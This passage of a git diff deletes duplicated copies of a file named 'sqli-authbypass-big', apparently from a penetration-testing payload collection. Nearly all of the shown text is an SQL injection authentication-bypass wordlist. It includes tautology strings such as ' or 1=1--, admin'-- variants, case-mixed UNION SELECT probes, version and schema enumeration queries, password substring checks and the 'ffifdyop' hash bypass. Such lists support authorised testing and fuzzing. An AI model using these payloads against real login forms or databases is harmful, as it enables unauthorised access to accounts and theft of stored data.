-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
